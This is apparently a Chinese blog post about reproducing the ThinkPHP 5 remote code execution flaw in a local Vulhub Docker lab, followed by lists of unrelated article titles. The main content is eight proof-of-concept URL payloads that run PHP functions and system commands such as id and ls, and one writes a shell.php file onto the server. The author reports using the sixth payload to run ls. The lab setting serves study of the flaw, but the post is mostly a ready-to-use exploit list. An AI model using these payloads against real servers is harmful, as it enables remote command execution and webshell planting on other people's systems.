https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce

docker-compose -f /home/root/compose.yml up

然后访问127.0.0.1:8080

POC:

1、?s=index/\think\Request/input&filter=phpinfo&data=1

2、?s=index/\think\Request/input&filter=system&data=id

3、?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

4、?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

5、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

6、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

7、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

8、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

看那个好用用哪个,我是直接用第六个:

http://127.0.0.1:8080/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

最新文章

  1. ccs3
  2. C++中函数的默认参数和C语言中volatile的学习
  3. java操作word
  4. c++空指针调用类成员函数
  5. Sicily 1732 Alice and Bob (二进制最大公约数)
  6. jQuery的Nicescroll滚动条插件使用方法
  7. 深入剖析虚拟DOM提升性能(Vue,React);
  8. js中类似null==flase的比较图集
  9. Median
  10. C++ 属性类
  11. 【Jenkins】testng+testNgXslt+ant优化测试报告
  12. 将 GitHub 上的代码向 Coding 更新
  13. LG Optimus L90 [D415] T-Mobile 刷机
  14. 基于内存,redis,mysql的高速游戏数据服务器设计架构 ZT
  15. AngularJS开发经验
  16. C# Timer自带定时器
  17. Mathcad操作tips:函数、符号计算
  18. docker从零开始网络(二)桥接网络
  19. JDK所有版本
  20. Linux命令之添加权限Chmod的使用

热门文章

  1. @Resource 注解的作用【和 @Autowired 的对比】
  2. centos中apache自用常用额外配置记录(xwamp)
  3. SQL Server Management Studio(SSMS)的使用与配置整理
  4. 【.Net】net 反射15分钟速成
  5. 【codeforces914G】Sum the Fibonacci FWT+FST(快速子集变换)
  6. 51nod 1526 分配笔名(字典树+贪心)
  7. CF335F Buy One, Get One Free 贪心
  8. HDU-3974 Assign the task题解报告【dfs序+线段树】
  9. php配置说明
  10. 【bzoj3173】最长上升子序列